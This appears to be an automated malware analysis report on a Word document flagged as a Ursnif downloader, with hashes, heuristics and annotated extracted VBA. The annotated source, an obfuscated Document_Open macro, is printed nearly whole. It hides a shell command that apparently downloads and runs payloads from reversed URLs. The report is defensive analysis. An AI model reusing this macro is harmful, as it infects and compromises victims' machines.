Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ccd4c745fb1d6d9…

MALICIOUS

Office (OLE)

66.0 KB Created: 2018-09-09 21:34:00 Authoring application: Microsoft Office Word First seen: 2020-01-07
MD5: 7e6980371f32c621d20998ef8e211bac SHA-1: 593532859a14a3cd2f46eba73f5398641544d551 SHA-256: 6ccd4c745fb1d6d9e1629b3eb80fc7e8286c902e3629f59a3677d3b9375497e0
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro that executes a Shell() command whose argument is assembled at run time by two helper functions, indicating an attempt to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' strongly suggests downloader functionality. The presence of a Document_Open macro — code that runs automatically when the document is opened with macros enabled — is a common technique in malicious Office documents.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6057 bytes
SHA-256: 951675fcb9f3573e50177c69a00eefe01041adf6a1b0dcba54dbd5e71260a49c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "vuSIFwbszJr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Word auto-run event handler: Document_Open fires as soon as the document is
' opened with macros enabled, so everything below runs without user action.
Private Sub Document_open()
' "On Error Resume Next" split across line continuations (one token per line),
' which makes the statement harder to grep for. It suppresses every runtime
' error in this procedure, so the "Second ..." lines below can fail silently.
On _
Error _
Resume _
Next
' "Second" is VBA's built-in Second() (seconds component of a Date). Calling
' it as a statement on concatenated string literals discards the result; for
' the non-date strings a conversion error is likely and is swallowed by the
' handler above. Either way these lines have no effect on the Shell call and
' act as filler around the one statement that does work.
   Second "351835809" + "Y"
   Second "163092390" + "275047844"
   Second "U" + "izsT" + "mjl" + "WkjA"
   Second "489399104" + "z" + "456788463" + "sbriz"
   Second "p" + "ApKbbv"
   Second "SiQY" + "LhzLJKVfw"
   Second "4226" + "GhPpRwso" + "2344" + "2850"
   Second "6966" + "UriiiXo"
' The payload: launch a child process whose command line is the concatenation
' of the strings returned by GBjKicIIGV() and zTKcw() (defined further down in
' this listing), with CStr(vbHide) as the window style so nothing is shown to
' the user. The decoded command is deliberately not reproduced here.
' Detection: this is the winword.exe -> child-process creation that endpoint
' process-creation telemetry should flag.
Shell GBjKicIIGV + zTKcw, CStr(vbHide)
   Second "279291282" + "Uwjz"
   Second "93048781" + "93451503"
End Sub



Attribute VB_Name = "vfkCQSP"
' Returns the first part of the command line used by the Shell call in
' Document_open(). The value is assembled at run time from eleven local string
' variables (see the concatenation just before End Function), so a static scan
' of the module text never sees the finished string.
Function GBjKicIIGV()

' Error suppression, again split over line continuations.
On _
Error _
Resume _
Next
' Obfuscation visible below (the decoded command is intentionally not written
' out in this annotation):
'   - Format(Chr(a + b + ...)) evaluates to one fixed character; the arithmetic
'     only hides which one from a reader.
'   - Fragments are split into many short literals joined with "+".
'   - Literals are laced with "^" characters, consistent with cmd.exe escaping
'     so the on-disk text differs from what the shell evaluates — confirm by
'     emulation rather than by eye.
'   - Interleaved "Second ..." statements are filler whose results are
'     discarded (errors swallowed by the handler above).
' For triage, recover the final string dynamically (e.g. olevba --deobf,
' ViperMonkey, or a sandbox run) and take the resulting process tree and
' network destinations as the indicators rather than hand-decoding.
Second "524967727" + "XzatFHFqN" + "vm" + "355600366"
qkNhzYXN = Format(Chr(10 + 5 + 11 + 6 + 67)) + "md /V^" + ":" + "/" + Format(Chr(7 + 3 + 8 + 4 + 45)) + Format(Chr(3 + 1 + 3 + 2 + 25)) + "^s" + "e" + "^t " + "^3^s^H=" + " ^  " + "       " + " ^ ^" + " ^" + " " + " "
Second "5712" + "8037"
HnjWtvi = "^  }^}" + "{" + "h" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "ta" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "}" + "^;^k" + "a" + "erb^" + ";q" + "^j" + "V$ ^me" + "tI-e^k" + "ovn^I" + "^;)^"
Second "19515307" + "459901455" + "LAW" + "QCmBPKHqRL"
hwDdXwjDd = "qjV^$ ^" + ",r^Y" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "^$" + "(" + "^eli" + "^" + "Fdao" + "ln^w" + "^o^D.V" + "n^F^$" + "^{"
Second "7411" + "3981"
   Second "SwO" + "300840454" + "tWQkNzIQ" + "bkmEAJuvHvns"
   Second "iFzCE" + "1468"
   Second "401124317" + "wzwwrQWHC"
fdjwCzYU = "y" + "rt{" + ")^T^wi$" + "^ n^i^ " + "rY" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "^$(^h" + Format(Chr(10 + 5 + 11 + 6 + 67))
Second "jW" + "MK"
   Second "5413" + "5160896" + "pLDaw" + "516094389"
saoblMaBNqu = "^a^e" + "rof^;'" + "^e^x" + "e.^'" + "+^B" + "^" + "d^Y^" + "$+'" + "^\^'+" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^" + "i" + "lbu^"
Second "487265081" + "310680315"
   Second "8516" + "RwQ" + "313212096" + "8028"
EbarKN = "p^" + ":v" + "n^e" + "$" + "^=^q" + "jV"
Second "hURhfo" + "106245300"
   Second "5076" + "9238" + "429763462" + "2090"
ICqvsiEwp = "$" + "^;^" + "'8^4^3" + "'" + "^ =^ B" + "^" + "dY$;)" + "'^" + "@'(" + "^t^i"
Second "913" + "HS" + "174120826" + "bvj"
   Second "nhvzqrPEn" + "lG"
DjWurD = "^" + "lpS^" + ".'" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "s^" + "4J" + "k" + "^K^o" + "Qt^t/" + Format(Chr(10 + 5 + 11 + 6 + 67)) + Format(Chr(10 + 5 + 11 + 6 + 67))
Second "490019513" + "LqoiLUM"
   Second "9528" + "P"
   Second "252160581" + "idaSa"
   Second "vdP" + "tGMR"
lTuozYwci = ".^t" + "n" + "^e" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^serou" + "lf/"
Second "35812747" + "7739" + "5981" + "8871"
   Second "kwWP" + "1792"
   Second "MnKjznpmZBf" + "223649770" + "469245664" + "zaDutYPrFFVKp"
tjZvQhT = "/^:^p" + "^tt^h" + "^@Q3rl^" + "k" + Format(Chr(7 + 3 + 8 + 4 + 45)) + "O" + "/^sedul" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "n^i/" + "n^i^" + "md^a-^p" + "w/^m^o" + Format(Chr(10 + 5 + 11 + 6 + 67)) + ".re^mag" + "^i^t^l" + "^u^.^w" + "^ww//^:"
Second "VTT" + "3858"
   Second "bu" + "n"
njzAs = "^p^tt^h" + "@^s" + "^UKz^g^" + "9^TY" + "/^ten." + "gn"
' Final assembly: fragment order here is the order in the emitted command.
GBjKicIIGV = qkNhzYXN + HnjWtvi + hwDdXwjDd + fdjwCzYU + saoblMaBNqu + EbarKN + ICqvsiEwp + DjWurD + lTuozYwci + tjZvQhT + njzAs
   Second "wEYmhDGQpD" + "AGjHSzrLb"
End Function
Function zTKcw()

On _
Error _
Resume _
Next
Second "h" + "8897"
   Second "7797" + "twItFL" + "48838412" + "309149553"
HvJGVGZtsJC = "ino^k" + "e" + "^i^" + "li^" + "m^a^" + "f//:^p^" + "tt^" + "h^@z^7"
Second "261299664" + "313267778"
   Second "AwX" + "kF" + "nSWT" + "XU"
   Second "qbCK" + "6646"
   Second "w" + "Y" + "124229670" + "6850"
VmTsfjOo = "^G^W" + "N7^" + "Yn/^t" + "n^e" + "tno" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^-p" + "w/" + "^m^o" + Format(Chr(10 + 5 + 11 + 6 + 67)) + "^." + "a" + "^br^" + "a^b^o^j" + "//^:p" + "tth^@^" + "p8h5"
Second "z" + "Nf" + "494
... (truncated)